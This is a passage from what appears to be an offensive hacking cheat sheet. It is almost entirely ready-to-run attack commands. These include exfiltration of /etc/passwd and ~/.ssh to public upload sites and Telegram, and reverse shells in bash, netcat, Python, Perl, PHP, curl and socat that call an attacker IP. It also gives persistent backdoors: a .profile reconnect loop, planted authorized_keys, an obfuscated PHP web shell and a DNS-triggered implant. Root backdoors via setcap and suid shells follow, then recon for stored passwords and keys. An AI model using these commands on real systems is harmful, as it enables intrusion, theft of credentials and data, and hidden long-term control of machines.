3\u003c\u003e\"/dev/tcp/${host}/${PORT:-80}\"\n    echo -en \"GET /${query} HTTP/1.0\\r\\nHost: ${host}\\r\\n\\r\\n\" \u003e\u00263\n    (while read -r l; do echo \u003e\u00262 \"$l\"; [[ $l == $'\\r' ]] \u0026\u0026 break; done \u0026\u0026 cat ) \u003c\u00263\n    exec 3\u003e\u0026-\n}\n# burl http://ipinfo.io\n# PORT=31337 burl http://37.120.235.188/blah.tar.gz \u003eblah.tar.gz\n```\n\n---\n\u003ca id=\"trans\"\u003e\u003c/a\u003e\n### 4.viii. 
File transfer using a public dump\n\nCut \u0026 paste into your bash:\n```sh\ntransfer() {\n    [[ $# -eq 0 ]] \u0026\u0026 { echo -e \u003e\u00262 \"Usage:\\n    transfer [file/directory]\\n    transfer [name] \u003cFILENAME\"; return 255; }\n    [[ ! -t 0 ]] \u0026\u0026 { curl -SsfL --progress-bar -T \"-\" \"https://transfer.sh/${1}\"; return; }\n    [[ ! -e \"$1\" ]] \u0026\u0026 { echo -e \u003e\u00262 \"Not found: $1\"; return 255; }\n    [[ -d \"$1\" ]] \u0026\u0026 { (cd \"${1}/..\"; tar cfz - \"${1##*/}\")|curl -SsfL --progress-bar -T \"-\" \"https://transfer.sh/${1##*/}.tar.gz\"; return; }\n    curl -SsfL --progress-bar -T \"$1\" \"https://transfer.sh/${1##*/}\"\n}\n```\n\nthen upload a file or a directory:\n```sh\ntransfer /etc/passwd  # A single file\ntransfer ~/.ssh       # An entire directory\n(curl ipinfo.io; hostname; uname -a; cat /proc/cpuinfo) | transfer \"$(hostname)\"\n```\nA list of our [favorite public upload sites](#cloudexfil).\n\n---\n\u003ca id=\"rsync\"\u003e\u003c/a\u003e\n### 4.ix. File transfer - using rsync\n\nIdeal for synchronizing large numbers of directories or restarting broken transfers. The example transfers the directory '*warez*' to the Receiver using a single TCP connection from the Sender to the Receiver. The plain rsync daemon protocol is unencrypted; see the OpenSSL variant below.\n\nReceiver:\n```posh\necho -e \"[up]\\npath=upload\\nread only=false\\nuid=$(id -u)\\ngid=$(id -g)\" \u003er.conf\nmkdir upload\nrsync --daemon --port=31337 --config=r.conf --no-detach\n```\n\nSender:\n```posh\nrsync -av warez rsync://1.2.3.4:31337/up\n```\n\nThe same encrypted (OpenSSL):\n\nReceiver:\n```posh\n# use rsa:2048 if ed25519 is not supported (e.g. 
rsync connection error)\nopenssl req -subj '/CN=example.com/O=EL/C=XX' -new -newkey ed25519 -days 14 -nodes -x509 -keyout ssl.key -out ssl.crt\ncat ssl.key ssl.crt \u003essl.pem\nrm -f ssl.key ssl.crt\nmkdir upload\ncat ssl.pem\nsocat OPENSSL-LISTEN:31337,reuseaddr,fork,cert=ssl.pem,cafile=ssl.pem EXEC:\"rsync --server -logtprR --safe-links --partial upload\"\n```\n\nSender:\n```posh\n# Copy the ssl.pem from the Receiver to the Sender and send directory named 'warez'\nIP=1.2.3.4\nPORT=31337\n# Using rsync + socat-ssl\nup1() {\n   rsync -ahPRv -e \"bash -c 'socat - OPENSSL-CONNECT:${IP:?}:${PORT:-31337},cert=ssl.pem,cafile=ssl.pem,verify=0' #\" -- \"$@\"  0:\n}\n# Using rsync + openssl\nup2() {\n   rsync -ahPRv -e \"bash -c 'openssl s_client -connect ${IP:?}:${PORT:-31337} -servername example.com -cert ssl.pem -CAfile ssl.pem -quiet 2\u003e/dev/null' #\" -- \"$@\"  0:\n}\nup1 /var/www/./warez\nup2 /var/www/./warez\n```\n\nRsync can be combined to exfil via [https / cloudflared raw TCP tunnels](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service).  \n(To exfil from Windows, use the rsync.exe from the [gsocket windows package](https://github.com/hackerschoice/binary/raw/main/gsocket/bin/gs-netcat_x86_64-cygwin_full.zip)). A noisier solution is [syncthing](https://syncthing.net/).\n\nPro Tip: Lazy hackers just type `exfil` on segfault.net.\n\n---\n\u003ca id=\"webdav\"\u003e\u003c/a\u003e\n### 4.x. File transfer - using WebDAV\n\nOn the receiver (e.g. segfault.net) start a Cloudflare-Tunnel and WebDAV:\n```sh\ncloudflared tunnel --url localhost:8080 \u0026\n# [...]\n# +--------------------------------------------------------------------------------------------+\n# |  Your quick Tunnel has been created! 
Visit it at (it may take some time to be reachable):  |\n# |  https://example-foo-bar-lights.trycloudflare.com                                          |\n# +--------------------------------------------------------------------------------------------+\n# [...]\nwsgidav --port=8080 --root=.  --auth=anonymous\n```\n\nOn another server:\n```sh\n# Upload a file to your workstation\ncurl -T file.dat https://example-foo-bar-lights.trycloudflare.com\n# Create a directory remotely\ncurl -X MKCOL https://example-foo-bar-lights.trycloudflare.com/sources\n# Create a directory hierarchy remotely\nfind . -type d | xargs -I{} curl -X MKCOL https://example-foo-bar-lights.trycloudflare.com/sources/{}\n# Upload all *.c files (in parallel):\nfind . -name '*.c' | xargs -P10 -I{} curl -T{} https://example-foo-bar-lights.trycloudflare.com/sources/{}\n```\n\nAccess the share from Windows (to drag \u0026 drop files) in File Explorer:\n```\n\\\\example-foo-bar-lights.trycloudflare.com@SSL\\sources\n```\n\nOr mount the WebDAV share on Windows (Z:/):\n```\nnet use * \\\\example-foo-bar-lights.trycloudflare.com@SSL\\sources\n```\n\n---\n\u003ca id=\"tg\"\u003e\u003c/a\u003e\n### 4.xi. File transfer to Telegram\n\nThere are [zillions of upload services](#cloudexfil) but TG is a neat alternative. Get a _TG-Bot-Token_ from the [TG BotFather](https://www.siteguarding.com/en/how-to-get-telegram-bot-api-token). Then create a new TG group and add your bot to the group. Retrieve the _chat_id_ of that group:\n```sh\ncurl -s \"https://api.telegram.org/bot\u003cTG-BOT-TOKEN\u003e/getUpdates\" | jq -r '.result[].message.chat.id' | uniq\n# If you get only {\"ok\":true,\"result\":[]} then remove and add the bot again.\n```\n\n```sh\n# Upload file.zip straight into the group chat:\ncurl -sF document=@file.zip \"https://api.telegram.org/bot\u003cTG-BOT-TOKEN\u003e/sendDocument?chat_id=\u003cTG-CHAT-ID\u003e\"\n```\n\n---\n\u003ca id=\"reverse-shell\"\u003e\u003c/a\u003e\n## 5. 
Reverse Shell / Dumb Shell\n\u003ca id=\"reverse-shell-gs-netcat\"\u003e\u003c/a\u003e\n**5.i.a. Reverse shell with gs-netcat (encrypted)**\n\nUse [gsocket deploy](https://gsocket.io/deploy). It spawns a fully functioning PTY reverse shell. Both you and the remote system can be behind NAT; the traffic is routed via a relay network. It also supports file upload/download (Ctrl-e c) and alarms when the admin logs in. If netcat is a swiss army knife then gs-netcat is a German battle axe :\u003e\n\n```sh\n# The secret is the only authentication: anyone who knows it can connect, so pick a long random one.\nX=ExampleSecretChangeMe bash -c \"$(curl -fsSL https://gsocket.io/y)\"\n# or X=ExampleSecretChangeMe bash -c \"$(wget --no-verbose -O- https://gsocket.io/y)\"\n```\n\nTo connect to the shell from your workstation:\n```sh\nS=ExampleSecretChangeMe bash -c \"$(curl -fsSL https://gsocket.io/y)\"\n# or gs-netcat -s ExampleSecretChangeMe -i\n# Add -T to tunnel through TOR\n```\n\n\u003ca id=\"reverse-shell-bash\"\u003e\u003c/a\u003e\n**5.i.b. Reverse shell with Bash**\n\nStart netcat to listen on port 1524 on your system:\n```sh\nnc -nvlp 1524\n```\nAfter connection, [upgrade](#reverse-shell-interactive) your shell to a fully interactive PTY shell. Alternatively use [pwncat-cs](https://pwncat.org/) instead of netcat:\n```sh\npwncat -lp 1524\n# Press \"Ctrl-C\" if pwncat gets stuck at \"registered new host ...\".\n# Then type \"back\" to get the prompt of the remote shell.\n```\n\nOn the remote system, this command will connect back to your system (IP = 3.13.3.7, Port 1524) and give you a shell prompt:\n```sh\n# If the current shell is Bash already:\n(bash -i \u0026\u003e/dev/tcp/3.13.3.7/1524 0\u003e\u00261) \u0026\n# If the current shell is NOT Bash then we need:\nbash -c '(exec bash -i \u0026\u003e/dev/tcp/3.13.3.7/1524 0\u003e\u00261) \u0026'\n# or hide the bash process as 'kqueue'\nbash -c '(exec -a kqueue bash -i \u0026\u003e/dev/tcp/3.13.3.7/1524 0\u003e\u00261) \u0026'\n```\n\n\u003ca id=\"curlshell\"\u003e\u003c/a\u003e\n**5.i.c. 
Reverse shell with cURL (encrypted)**\n\nUse [curlshell](https://github.com/SkyperTHC/curlshell). This also works through proxies and when direct TCP connections to the outside world are prohibited:\n```sh\n# On YOUR workstation\n# Generate SSL keys:\nopenssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj \"/CN=THC\"\n# Start your listening server:\n./curlshell.py --certificate cert.pem --private-key key.pem --listen-port 8080\n```\n```sh\n# On the target (-k skips certificate checks: the channel is encrypted but the target does not\n# authenticate your server; use curl --pinnedpubkey if that matters):\ncurl -skfL https://3.13.3.7:8080 | bash\n```\n\n\u003ca id=\"curltelnet\"\u003e\u003c/a\u003e\n**5.i.d Reverse shell with cURL (cleartext)**\n\nStart ncat to listen for multiple connections:\n```sh\nncat -kltv 1524\n```\n```sh\n# On the target:\nC=\"curl -Ns telnet://3.13.3.7:1524\"; $C \u003c/dev/null 2\u003e\u00261 | sh 2\u003e\u00261 | $C \u003e/dev/null\n```\n\n\u003ca id=\"sslshell\"\u003e\u003c/a\u003e\n**5.i.e. Reverse shell with OpenSSL (encrypted)**\n\n```sh\n# On YOUR workstation:\n# Generate SSL keys:\nopenssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj \"/CN=THC\"\n# Start your listening server:\nopenssl s_server -port 1524 -cert cert.pem -key key.pem\n# Or pwncat:\n# pwncat -lp 1524 --ssl\n```\n\n```sh\n# On the target, start an openssl reverse shell as background process:\n({ openssl s_client -connect 3.13.3.7:1524 -quiet \u003c/dev/fd/3 3\u003e\u0026- 2\u003e/dev/null | sh 2\u003e\u00263 \u003e\u00263 3\u003e\u0026- ; } 3\u003e\u00261 | : \u0026 )\n```\n\n\u003ca id=\"reverse-shell-no-bash\"\u003e\u003c/a\u003e\n**5.i.f. Reverse shell without /dev/tcp**\n\nEmbedded systems do not always have Bash and the */dev/tcp/* trick will not work. There are many other ways (Python, PHP, Perl, ..). 
Our favorite is to upload netcat and use netcat or telnet:\n\nOn the remote system:\n\n```sh\nnc -e /bin/sh -vn 3.13.3.7 1524\n```\n\nVariant if *'-e'* is not supported:\n```sh\n{ nc -vn 3.13.3.7 1524 \u003c/dev/fd/3 3\u003e\u0026- | sh 2\u003e\u00263 \u003e\u00263 3\u003e\u0026- ; } 3\u003e\u00261 | :\n```\n\n* On modern shells this can be shortened to `{ nc 3.13.3.7 1524 \u003c/dev/fd/2|sh;} 2\u003e\u00261|:`. (*thanks IA_PD*).  \n* The `| :` trick won't work on C-Shell/tcsh (FreeBSD), original Bourne shell (Solaris) or Korn shell (AIX). Use `mkfifo` instead.\n\nVariant for older */bin/sh*:\n```sh\nmkfifo /tmp/.io; sh -i 2\u003e\u00261 \u003c/tmp/.io | nc -vn 3.13.3.7 1524 \u003e/tmp/.io\n```\n\nTelnet variant:\n```sh\nmkfifo /tmp/.io; sh -i 2\u003e\u00261 \u003c/tmp/.io | telnet 3.13.3.7 1524 \u003e/tmp/.io\n```\n\nTelnet variant when mkfifo is not supported (Ulg!):\n```sh\ntouch /tmp/.fio; tail -f /tmp/.fio | sh -i | telnet 3.13.3.7 1524 \u003e/tmp/.fio\n```\nNote: Don't forget to `rm /tmp/.fio` (or `/tmp/.io` for the mkfifo variants) after login. The `tail -f` variant keeps every command you type in that file until you remove it.\n\n\u003ca id=\"sshx\"\u003e\u003c/a\u003e\n**5.i.g. 
Reverse shell with sshx.io (encrypted)**\n\nAccess a remote shell from your web browser [https://sshx.io](https://sshx.io).\n\n```shell\ncurl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2\u003e/dev/null \u003e.s \\\n\u0026\u0026 chmod 755 .s \\\n\u0026\u0026 (PATH=.:$PATH .s -q \u003e.u 2\u003e/dev/null \u0026);\nfor _ in {1..10}; do [ -s .u ] \u0026\u0026 break;sleep 1;done;cat .u;rm -f .u .s;\n```\n\nOr pipe directly into memory:\n```shell\ncd /tmp;(curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2\u003e/dev/null|perl '-efor(319,279){($f=syscall$_,$\",1)\u003e0\u0026\u0026last};open($o,\"\u003e\u0026=\".$f);print$o(\u003cSTDIN\u003e);exec{\"/proc/$$/fd/$f\"}\"/usr/bin/python3\",@ARGV' -- \"-q\" \u003e.u 2\u003e/dev/null \u0026);sleep 10;cat .u\u0026\u0026rm -f .u\n```\n\n\u003ca id=\"revese-shell-remote-moe\"\u003e\u003c/a\u003e\n**5.i.h. Reverse shell with remote.moe and ssh (encrypted)**\n\nIt is possible to tunnel raw TCP (e.g bash reverse shell) through [remote.moe](https://remote.moe):\n\nOn your workstation:\n```sh\n# First Terminal - Create a remote.moe tunnel to your workstation\nssh-keygen -q -t rsa -N \"\" -f .r  # New key creates a new remote.moe-address\nssh -i .r -R31337:0:8080 -o StrictHostKeyChecking=no nokey@remote.moe; rm -f .r\n# Note down the 'remote.moe' address which will look something like\n# uydsgl6i62nrr2zx3bgkdizlz2jq2muplpuinfkcat6ksfiffpoa.remote.moe\n\n# Second Terminal - start listening for the reverse shell\nnc -vnlp 8080\n```\n\nOn the target(needs SSH and Bash):\n```sh\nbash -c '(killall ssh; rm -f /tmp/.r; ssh-keygen -q -t rsa -N \"\" -f /tmp/.r; ssh -i /tmp/.r -o StrictHostKeyChecking=no -L31338:uydsgl6i62nrr2zx3bgkdizlz2jq2muplpuinfkcat6ksfiffpoa.remote.moe:31337 -Nf remote.moe;  bash -i \u0026\u003e/dev/tcp/0/31338 0\u003e\u00261 \u0026)'\n```\n\nOn the target (alternative; needs ssh, bash and mkfifo):\n```sh\nrm -f /tmp/.p 
/tmp/.r; ssh-keygen -q -t rsa -N \"\" -f /tmp/.r \u0026\u0026 mkfifo /tmp/.p \u0026\u0026 (bash -i\u003c/tmp/.p  2\u003e1 |ssh -i /tmp/.r -o StrictHostKeyChecking=no -W uydsgl6i62nrr2zx3bgkdizlz2jq2muplpuinfkcat6ksfiffpoa.remote.moe:31337 remote.moe\u003e/tmp/.p \u0026)\n```\n\n\u003ca id=\"reverse-shell-python\"\u003e\u003c/a\u003e\n**5.i.i. Reverse shell with Python**\n```sh\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"3.13.3.7\",1524));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n```\n\n\u003ca id=\"reverse-shell-perl\"\u003e\u003c/a\u003e\n**5.i.j. Reverse shell with Perl**\n\n```sh\n# method 1\nperl -e 'use Socket;$i=\"3.13.3.7\";$p=1524;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/sh -i\");};'\n# method 2\nperl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"3.13.3.7:1524\");STDIN-\u003efdopen($c,r);$~-\u003efdopen($c,w);while(\u003c\u003e){if($_=~ /(.*)/){system $1;}};'\n```\n\u003ca id=\"reverse-shell-php\"\u003e\u003c/a\u003e\n**5.i.k. Reverse shell with PHP**\n\n```sh\nphp -r '$sock=fsockopen(\"3.13.3.7\",1524);exec(\"/bin/bash -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");'\n```\n\n\u003ca id=\"reverse-shell-upgrade\"\u003e\u003c/a\u003e\n\u003ca id=\"reverse-shell-pty\"\u003e\u003c/a\u003e\n**5.ii.a. Upgrade a reverse shell to a PTY shell**\n\nAny of the above reverse shells are limited. For example *sudo bash* or *top* will not work. 
To make these work we have to upgrade the shell to a real PTY shell:\n\n```sh\n# Using script\nexec script -qc /bin/bash /dev/null  # Linux\nexec script -q /dev/null /bin/bash   # BSD\n```\n\n```sh\n# Using python\nexec python -c 'import pty; pty.spawn(\"/bin/bash\")'\n```\n\n\u003ca id=\"reverse-shell-interactive\"\u003e\u003c/a\u003e\n**5.ii.b. Upgrade a reverse shell to a fully interactive shell**\n\n...and if we also want to use Ctrl-C etc. then we have to go all the way and upgrade the reverse shell to a real fully colorful interactive shell:\n\n```sh\n# On the target host spawn a PTY using any of the above examples:\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\n# Now Press Ctrl-Z to suspend the connection and return to your own terminal.\n```\n\n```sh\n# On your terminal execute:\nstty raw -echo icrnl opost; fg\n```\n\n```sh\n# On target host\nexport SHELL=/bin/bash\nexport TERM=xterm-256color\nreset -I\nstty -echo;printf \"\\033[18t\";read -rdt R;stty sane $(echo \"${R:-8;80;25}\"|awk -F\";\" '{ printf \"rows \"$3\" cols \"$2; }')\n# Pimp up your prompt\n# PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d\" \" /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \\[\\e[36m\\]\\u\\[\\e[m\\]@\\[\\e[32m\\]\\h:\\[\\e[33;1m\\]\\w \\[\\e[0;31m\\]\\$\\[\\e[m\\] '\nPS1='\\[\\033[36m\\]\\u\\[\\033[m\\]@\\[\\033[32m\\]\\h:\\[\\033[33;1m\\]\\w\\[\\033[m\\]\\$ '\n```\n\n\u003ca id=\"reverse-shell-socat\"\u003e\u003c/a\u003e\n**5.ii.c. Reverse shell with socat (fully interactive)**\n\n...or install socat and get it done without much fiddling about:\n\n```sh\n# on attacker's host (listener)\nsocat file:`tty`,raw,echo=0 tcp-listen:1524\n# on target host (reverse shell)\nsocat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:3.13.3.7:1524\n```\n\n---\n\u003ca id=\"backdoor\"\u003e\u003c/a\u003e\n## 6. 
Backdoors\n\nMostly we use gs-netcat's automated deployment script: [https://www.gsocket.io/deploy](https://www.gsocket.io/deploy).\n```sh\nbash -c \"$(curl -fsSLk https://gsocket.io/y)\"\n```\nor\n```sh\nbash -c \"$(wget --no-check-certificate -qO- https://gsocket.io/y)\"\n```\n\nor deploy gsocket by running your own deployment server:\n```sh\nLOG=results.log bash -c \"$(curl -fsSL https://gsocket.io/ys)\"  # Notice '/ys' instead of '/y'\n```\n\n\u003ca id=\"backdoor-background-reverse-shell\"\u003e\u003c/a\u003e\n**6.i. Background reverse shell**\n\nA reverse shell that keeps trying to connect back to us every 360 seconds (indefinitely). Often used until a real backdoor can be deployed; it guarantees easy re-entry to a system in case our connection gets disconnected. \n\n```sh\nsetsid bash -c 'while :; do bash -i \u0026\u003e/dev/tcp/3.13.3.7/1524 0\u003e\u00261; sleep 360; done' \u0026\u003e/dev/null\n```\n\nor put this in the user's *~/.profile* (it also stops multiple instances from being started):\n```sh\nfuser /dev/shm/.busy \u0026\u003e/dev/null || nohup /bin/bash -c 'while :; do touch /dev/shm/.busy; exec 3\u003c/dev/shm/.busy; bash -i \u0026\u003e/dev/tcp/3.13.3.7/1524 0\u003e\u00261 ; sleep 360; done' \u0026\u003e/dev/null \u0026\n```\n\n\u003ca id=\"backdoor-auth-keys\"\u003e\u003c/a\u003e\n**6.ii. authorized_keys**\n\nAdd your ssh public key to */root/.ssh/authorized_keys*. It's the most reliable backdoor ever :\u003e\n\n* It survives reboots.\n* It even survives re-installs. 
Admins have been known to make a backup of authorized_keys and then put it straight back onto the newly installed system.\n* We have even seen our key being copied to other companies!\n\nTip: Change the name at the end of the ssh public keyfile to something obscure like *backup@ubuntu* or the admin's real name:\n```console\n$ cat id_rsa.pub\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCktFkgm40GDkqYwJkNZVb+NLqYoUNSPVPLx0VDbJM0\n[...]\nu1i+MhhnCQxyBZbrWkFWyzEmmHjZdAZCK05FRXYZRI9yadmvo7QKtRmliqABMU9WGy210PTOLMltbt2C\nc3zxLNse/xg0CC16elJpt7IqCFV19AqfHnK4YiXwVJ+M+PyAp/aEAujtHDHp backup@ubuntu\n```\n\u003ca id=\"backdoor-network\"\u003e\u003c/a\u003e\n**6.iii. Remote Access to an entire network**\n\nInstall [gs-netcat](https://github.com/hackerschoice/gsocket). It creates a SOCKS exit-node on the Host's private LAN which is accessible through the Global Socket Relay Network without the need to run your own relay-server (e.g. access the remote private LAN directly from your workstation):\n\n```sh\ngs-netcat -l -S       # compromised Host\n```\n\nNow from your workstation you can connect to ANY host on the Host's private LAN:\n```sh\ngs-netcat -p 1080    # Your workstation.\n\n# Access route.local:22 on the Host's private LAN from your Workstation:\nsocat -  \"SOCKS4a:127.1:route.local:22\"\n```\nRead [Use any tool via Socks Proxy](#scan-proxy).\n\nOther methods:\n* [Gost/Cloudflared](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) - our very own article\n* [Reverse Wireguard](https://thc.org/segfault/wireguard) - from segfault.net to any (internal) network.\n\n\u003ca id=\"php-backdoor\"\u003e\u003c/a\u003e\n**6.iv. Smallest PHP Backdoor**\n\nAdd this line at the beginning of any PHP file:\n```php\n\u003c?php $i=base64_decode(\"aWYoaXNzZXQoJF9QT1NUWzBdKSl7c3lzdGVtKCRfUE9TVFswXSk7ZGllO30K\");eval($i);?\u003e\n```\nIt is the base64 encoding of:\n```php\nif(isset($_POST[0])){system($_POST[0]);die;}\n```\n\nTest the backdoor:\n```sh\n### 1. 
Optional: Start a test PHP server\ncd /var/www/html \u0026\u0026 php -S 127.0.0.1:8080\n### Without executing a command\ncurl http://127.0.0.1:8080/test.php\n### With executing a command\ncurl http://127.0.0.1:8080/test.php -d 0=\"ps fax; uname -mrs; id\"\n```\n\nSometimes `system()` is prohibited. Add `eval()` to allow remote PHP-code execution as a backup. Hide within other base64-comments for some obfuscation:\n```php\n\u003c?PHP /*1rUY9TDs2wG8In1HkSQzqViVtX2nGidgu/RkzKNJbfho9NqtfTaww4GcR6bIGU+U1AJq\nUSOIjliQm4T/9HP6YS6IMhwoZzmr2iydbwDcVynDqtLjI5i7owLKmjbKnijTszoXP/dif9ZcbhtJ\nWQKmhCno0boYQQ2rjHgW3su1C7pYREPSdrYD/4QBpptJU7Djnm5zuyD2TXNjHXm/ZYUW+n4s3PM7\naWqzWzy*/if(isset($_POST[0])){eval($_POST[1]?:\"\");system($_POST[0]);die;}/*P\n0KKBW1rvtqxOK8L9Ok6y7Rulkl2um62KVxvVx/+kODDw4HZV5Yx/HK/7lG+X/IkK8LViCIuaedXl\nHM1wHBlDluhe8BN6pH33fn0bfFpjCDaKrKwK3QF6ExJu1JgKK9deyWUTcqbr0dhe7ZliOIldh3of\n+4qUjhVdK4SoeND/Dd+iwRAbhZKxaHfng4ADqdWrwjUPoyTjzOp6C3iDzunviiG0RC3iDuCY*/?\u003e\n```\n\nTrigger with any of these to execute a command or PHP code:\n```shell\n# Execute just command\ncurl http://127.0.0.1:8080/x.php -d0='id'\n# Execute just PHP code\ncurl http://127.0.0.1:8080/x.php -d0='' -d1='echo file_get_contents(\"/etc/hosts\");'\n```\n\n\u003ca id=\"reverse-dns-backdoor\"\u003e\u003c/a\u003e\n**6.v. Smallest reverse DNS-tunnel Backdoor**\n\nExecute arbitrary commands on a server that is _not_ accessible from the public Internet by using a reverse DNS trigger.\n\nAdd this line (the implant) at the beginning of any PHP file:\n```php\n\u003c?PHP eval(base64_decode(dns_get_record(\"b00m.team-teso.net\", DNS_TXT)[0]['txt'])); ?\u003e\n```\n\nThe implant requests the payload via a DNS TXT-request from the domain `b00m.team-teso.net`. When triggered, it creates `/tmp/.b00m` and notifies THC (via an app.interactsh.com callback). *Please* use your own domain and also create your own payload. 
Example:\n```shell\necho -n '@system(\"{ id; date;}\u003e/tmp/.b00m 2\u003e/dev/null\");' |base64 -w0\n```\n\n- The DNS TXT payload is limited to 2,048 characters (sometimes 65,535 characters).\n- The implant is a `bootloader`. Use a while loop to download and execute a larger payload via DNS.\n- Check out our favorite places to [register a domain anonymously](#pub).\n\nIt can also be triggered via `~/.bashrc` or the user's crontab. Use (example):\n```shell\n# Use a \"double bash\" to also redirect $()-subshell errors to /dev/null:\nbash -c 'exec bash -c \"{ $(dig +short b00m2.team-teso.net TXT|tr -d \\ \\\"|base64 -d);}\"'\u0026\u003e/dev/null\n```\n\n\u003ca id=\"ld-backdoor\"\u003e\u003c/a\u003e\n**6.vi. Local Root Backdoor**\n\n#### 1. Backdooring the dynamic loader with setcap\n\n```bash\n### Execute as ROOT user\nfn=\"$(readlink -f /lib64/ld-*.so.*)\" || fn=\"$(readlink -f /lib/ld-*.so.*)\" || fn=\"/lib/ld-linux.so.2\"\nsetcap cap_setuid,cap_setgid+ep \"${fn}\"\n```\n\n```bash\n### Execute as non-root user to get root\nfn=\"$(readlink -f /lib64/ld-*.so.*)\" || fn=\"$(readlink -f /lib/ld-*.so.*)\" || fn=\"/lib/ld-linux.so.2\"\np=\"$(command -v python3 2\u003e/dev/null)\" || p=\"$(command -v python)\"\n\"${fn:?}\" \"$p\" -c 'import os;os.setuid(0);os.setgid(0);os.execlp(\"bash\", \"kdaemon\")'\n```\n\n#### 2. Good old b00m shell\n\n```shell\n{ cp /bin/sh /var/tmp/.b00m; chmod 6775 /var/tmp/.b00m; } 2\u003e/dev/null \u003e/dev/null\n```\n\n```shell\nexec /var/tmp/.b00m -p -c 'exec python -c \"import os;os.setuid(0);os.execlp(\\\"bash\\\", \\\"kdaemon\\\")\"'\n```\n\n\u003ca id=\"implant\"\u003e\u003c/a\u003e\n**6.vii. Self-Extracting implant**\n\nCreate a self-extracting shell-script using [mkegg.sh](https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/blob/master/tools/mkegg.sh) (see source for examples).\n\nSimple example:\n```sh\n# Create implant 'egg.sh' containing the file 'foo'\n# and the directory 'warez'. 
When executing 'egg.sh' then\n# extract 'foo' and 'warez' and call 'warez/run.sh'\n./mkegg.sh egg.sh foo warez warez/run.sh\n```\n\nReal world examples are best:\n1. Create an implant that installs gsocket and calls our webhook on success:\n```sh\n./mkegg.sh egg.sh deploy-all.sh '(GS_WEBHOOK_KEY=e90d4b38-8285-490d-b5ab-a6d5c7c990a7 deploy-all.sh 2\u003e/dev/null \u003e/dev/null \u0026)'\n# On the target system do: 'cat egg.sh | bash' or './egg.sh'\n```\n\n2. Rename `egg.sh` to `update-for-fools.txt` and upload as blob to [Signal's](https://www.signal.org/) GitHub repository.\n\n3. Don't fool people into updating Signal using this command ❤️:\n```sh\ncurl -fL https://github.com/signalapp/Signal-Desktop/files/15037868/update-for-fools.txt | bash\n```\n\n\u003ca id=\"hostrecon\"\u003e\u003c/a\u003e\n## 7. Host Recon\n---\n\nGet [essential information](https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/blob/master/tools/whatserver.sh) about a host:\n```sh\nbash -c \"$(curl -fsSL https://thc.org/ws)\"\n```\nor\n```sh\nbash -c \"$(curl -fsSL https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/raw/master/tools/whatserver.sh)\"\n```\n\nnetstat if there is no netstat/ss/lsof:\n```sh\ncurl -fsSL https://raw.githubusercontent.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/master/tools/awk_netstat.sh | bash\n```\n\nSpeed check the system:\n```sh\ncurl -fsSL https://bench.sh | bash\n# Another speed check:  \n# curl -fsSL https://yabs.sh | bash\n```\n\nFind all suid/sgid binaries:\n```sh\nfind  / -xdev -type f -perm /6000  -ls 2\u003e/dev/null\n```\n\nFind all writeable directories:\n```bash\nwfind() {\n    local arr dir\n\n    arr=(\"$@\")\n    while [[ ${#arr[@]} -gt 0 ]]; do\n        dir=${arr[${#arr[@]}-1]}\n        unset \"arr[${#arr[@]}-1]\"\n        find \"$dir\"  -maxdepth 1 -type d -writable -ls 2\u003e/dev/null\n        IFS=$'\\n' arr+=($(find \"$dir\" -mindepth 1 -maxdepth 1 -type d ! 
-writable 2\u003e/dev/null))\n    done\n}\n# Usage: wfind /\n# Usage: wfind /etc /var /usr \n```\n\nFind local passwords (using [noseyparker](https://github.com/praetorian-inc/noseyparker)):\n```sh\ncurl -o np -fsSL https://github.com/hackerschoice/binary/raw/main/tools/noseyparker-x86_64-static\nchmod 700 np \u0026\u0026 \\\n./np scan . \u0026\u0026 \\\n./np report --color=always | less -R\n```\n(Or use [PassDetective](https://github.com/aydinnyunus/PassDetective) to find passwords in ~/.*history)\n\nUsing `grep`:\n```sh\n# Find passwords (without garbage).\ngrep -HEronasi  '.{,16}password.{,64}' .\n# Find TLS or OpenSSH keys:\ngrep -r -F -- \" PRIVATE KEY-----\" .\n```\n\nFind subdomains or emails in files:\n```bash\nresolv() { while read -r x; do r=\"$(getent hosts \"$x\")\" || continue; echo \"${r%% *}\"$'\\t'\"${x}\"; done; }\nfind_subdomains() {\n\tlocal d=\"${1//./\\\\.}\"\n\tlocal rexf='[0-9a-zA-Z_.-]{0,64}'\"${d}\"\n\tlocal rex=\"$rexf\"'([^0-9a-zA-Z_]{1}|$)'\n\t[ $# -le 0 ] \u0026\u0026 { echo -en \u003e\u00262 \"Extract sub-domains from all files (or stdin)\\nUsage  : find_subdomains \u003capex-domain\u003e \u003cfile\u003e\\nExample: find_subdomains .com | anew\"; return; }\n\tshift 1\n\t[ $# -le 0 ] \u0026\u0026 [ -t 0 ] \u0026\u0026 set -- .\n\tcommand -v rg \u003e/dev/null \u0026\u0026 { rg -oaIN --no-heading \"$rex\" \"$@\" | grep -Eao \"$rexf\"; return; 